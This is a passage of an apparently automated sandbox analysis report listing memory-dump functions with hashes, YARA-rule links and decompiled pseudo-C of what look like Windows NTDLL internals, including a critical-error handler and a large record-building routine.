                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: Actx
                        • API String ID: 0-89312691
                        • Opcode ID: ccb06221fb500c965c7147b8965684a8123793b44d49aca52837b566f28cf3da
                        • Instruction ID: b196d8174bfba966fc41c4c253b354d237de19cfed3e052329f26fba0904f0c0
                        • Opcode Fuzzy Hash: ccb06221fb500c965c7147b8965684a8123793b44d49aca52837b566f28cf3da
                        • Instruction Fuzzy Hash: 1C11C1397047028BEB344E1D889073672A6EF96668FA845BAE476CBBA1DB74C841C340
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BA8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                        Download Yara Rule
                        C-Code - Quality: 71%
                        			E02BA8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x2bd0d50);
				E02B4D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E02B85720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L02B4DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L02B4DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E02B4D130(_t34, _t39, _t40);
			}





                        0x02ba8df1
                        0x02ba8df1
                        0x02ba8df1
                        0x02ba8df1
                        0x02ba8df1
                        0x02ba8df1
                        0x02ba8df3
                        0x02ba8df8
                        0x02ba8dfd
                        0x02ba8e00
                        0x02ba8e0e
                        0x02ba8e2a
                        0x02ba8e36
                        0x02ba8e38
                        0x02ba8e3c
                        0x02ba8e46
                        0x02ba8e46
                        0x02ba8e36
                        0x02ba8e50
                        0x02ba8e56
                        0x02ba8e59
                        0x02ba8e5c
                        0x02ba8e60
                        0x02ba8e67
                        0x02ba8e6d
                        0x02ba8e73
                        0x02ba8e74
                        0x02ba8eb1
                        0x02ba8ebd

                        Strings
                        • Critical error detected %lx, xrefs: 02BA8E21
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: Critical error detected %lx
                        • API String ID: 0-802127002
                        • Opcode ID: ce6d8d750bac25b48a23024d573fee8b1de27121bdc0b22149ca6749aeed866b
                        • Instruction ID: 953d3ec9532de6bb3ac88488f48cef3ee6044de02671656e43749f37034cd7d7
                        • Opcode Fuzzy Hash: ce6d8d750bac25b48a23024d573fee8b1de27121bdc0b22149ca6749aeed866b
                        • Instruction Fuzzy Hash: AD118771E48348EBEF24DFA885057DCBBB1FB04314F20829EE529AB292D7310602CF14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B8FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                        Download Yara Rule
                        Strings
                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 02B8FF60
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                        • API String ID: 0-1911121157
                        • Opcode ID: f17827574cccfd55271bbdbab515b7eb9091286e4b9e36db45a6bb0eabe55e2a
                        • Instruction ID: 61172473ecf7a01e99f80684f1cd185b36b9cd301fc9fe0741f2880f265b4e9c
                        • Opcode Fuzzy Hash: f17827574cccfd55271bbdbab515b7eb9091286e4b9e36db45a6bb0eabe55e2a
                        • Instruction Fuzzy Hash: 2911C471A51244EFEF21EB50C988FACB7B2FF08718F5484D4F5095B661CB399950DB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BC5BA5, Relevance: .6, Instructions: 592COMMON
                        Download Yara Rule
                        C-Code - Quality: 88%
                        			E02BC5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x2bd1178);
				E02B4D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E02BC4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E02B3D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E02BC5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x2be60e8;
								if( *0x2be60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x2be60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E02B39710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E02B36DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E02B3F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E02B3F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E02B3F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E02B3FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E02B3FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E02B3F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E02B3F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E02BC4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E02B4D130(_t427, _t494, _t511);
				}
			}










































































                        0x02bc5ba5
                        0x02bc5baa
                        0x02bc5baf
                        0x02bc5bb4
                        0x02bc5bb6
                        0x02bc5bbc
                        0x02bc5bbe
                        0x02bc5bc4
                        0x02bc5bcd
                        0x02bc5bd3
                        0x02bc5bd6
                        0x02bc5bdc
                        0x02bc5be0
                        0x02bc5be3
                        0x02bc5beb
                        0x02bc5bf2
                        0x02bc5bf8
                        0x02bc5bfe
                        0x02bc5c04
                        0x02bc5c0e
                        0x02bc5c18
                        0x02bc5c1f
                        0x02bc5c25
                        0x02bc5c2a
                        0x02bc5c2c
                        0x02bc5c32
                        0x02bc5c3a
                        0x02bc5c3f
                        0x02bc5c42
                        0x02bc5c48
                        0x02bc5c5b
                        0x02bc5c5b
                        0x02bc5c2c
                        0x02bc5cb7
                        0x02bc5cb9
                        0x02bc5cbf
                        0x02bc5cc2
                        0x02bc5cca
                        0x02bc5ccb
                        0x02bc5ccb
                        0x02bc5cd1
                        0x02bc5cd7
                        0x02bc5cda
                        0x02bc5ce1
                        0x02bc5ce4
                        0x02bc5ce7
                        0x02bc5ced
                        0x02bc5cf3
                        0x02bc5cf9
                        0x02bc5cff
                        0x02bc5d08
                        0x02bc5d0a
                        0x02bc5d0e
                        0x02bc5d10
                        0x00000000
                        0x00000000
                        0x02bc5d16
                        0x02bc5d1a
                        0x00000000
                        0x00000000
                        0x02bc5d20
                        0x02bc5d22
                        0x02bc5d25
                        0x02bc5d2f
                        0x02bc5d2f
                        0x02bc5d33
                        0x02bc5d3d
                        0x02bc5d49
                        0x02bc5d4b
                        0x00000000
                        0x00000000
                        0x02bc5d5a
                        0x02bc5d5d
                        0x02bc5d60
                        0x00000000
                        0x00000000
                        0x02bc5d66
                        0x02bc5d69
                        0x00000000
                        0x00000000
                        0x02bc5d6f
                        0x02bc5d6f
                        0x02bc5d73
                        0x02bc5d79
                        0x02bc5d7f
                        0x02bc5d86
                        0x02bc5d95
                        0x02bc5d98
                        0x02bc5dba
                        0x02bc5dcb
                        0x02bc5dce
                        0x02bc5dd3
                        0x02bc5dd6
                        0x02bc5dd8
                        0x02bc5de6
                        0x02bc5dec
                        0x02bc5dee
                        0x02bc5df1
                        0x02bc5df3
                        0x02bc635a
                        0x02bc635a
                        0x00000000
                        0x02bc635a
                        0x02bc5dfe
                        0x02bc5e02
                        0x02bc5e05
                        0x02bc5e07
                        0x02bc5e10
                        0x02bc5e13
                        0x02bc5e1b
                        0x02bc5e1c
                        0x02bc5e21
                        0x02bc5e22
                        0x02bc5e23
                        0x02bc5e25
                        0x02bc5e2a
                        0x02bc5e2c
                        0x02bc5e2e
                        0x02bc5e36
                        0x02bc5e39
                        0x02bc5e42
                        0x02bc5e47
                        0x02bc5e4d
                        0x02bc5e54
                        0x02bc5e54
                        0x02bc5e54
                        0x02bc5e2e
                        0x02bc5e5c
                        0x02bc5e5f
                        0x02bc5e62
                        0x02bc5e64
                        0x02bc5e6b
                        0x02bc5e70
                        0x02bc5e7a
                        0x02bc5e7a
                        0x02bc5e7a
                        0x02bc5e6b
                        0x02bc5e7e
                        0x02bc5e7f
                        0x02bc5e7f
                        0x02bc5e81
                        0x02bc5e87
                        0x02bc5e8b
                        0x02bc5e8c
                        0x02bc5e8c
                        0x02bc5e8c
                        0x02bc5e9a
                        0x02bc5e9c
                        0x02bc5ea2
                        0x02bc5ea6
                        0x02bc5f50
                        0x02bc5f50
                        0x02bc5f57
                        0x02bc5f66
                        0x02bc5f66
                        0x02bc5f66
                        0x02bc5f68
                        0x02bc5f6a
                        0x02bc63d0
                        0x00000000
                        0x02bc5f70
                        0x02bc5f70
                        0x02bc5f91
                        0x02bc5f9c
                        0x02bc5f9e
                        0x02bc5fa4
                        0x02bc5fa6
                        0x02bc638c
                        0x02bc6392
                        0x02bc63a1
                        0x02bc63a7
                        0x02bc63af
                        0x02bc63af
                        0x02bc63bd
                        0x02bc63d8
                        0x00000000
                        0x02bc63d8
                        0x02bc5fac
                        0x02bc5fb2
                        0x02bc5fb4
                        0x02bc5fbd
                        0x02bc5fc6
                        0x02bc5fce
                        0x02bc5fd4
                        0x02bc5fdc
                        0x02bc5fec
                        0x02bc5fed
                        0x02bc5fee
                        0x02bc5fef
                        0x02bc5ff9
                        0x02bc5ffa
                        0x02bc5ffb
                        0x02bc5ffc
                        0x02bc6000
                        0x02bc6004
                        0x02bc6012
                        0x02bc6012
                        0x02bc6018
                        0x02bc6019
                        0x02bc601a
                        0x02bc601b
                        0x02bc601c
                        0x02bc6020
                        0x02bc6059
                        0x02bc605c
                        0x02bc6061
                        0x02bc6061
                        0x02bc6022
                        0x02bc6022
                        0x02bc6022
                        0x02bc6025
                        0x02bc602a
                        0x02bc602b
                        0x02bc6031
                        0x02bc6037
                        0x02bc6038
                        0x02bc603e
                        0x02bc6048
                        0x02bc6049
                        0x02bc604a
                        0x02bc604b
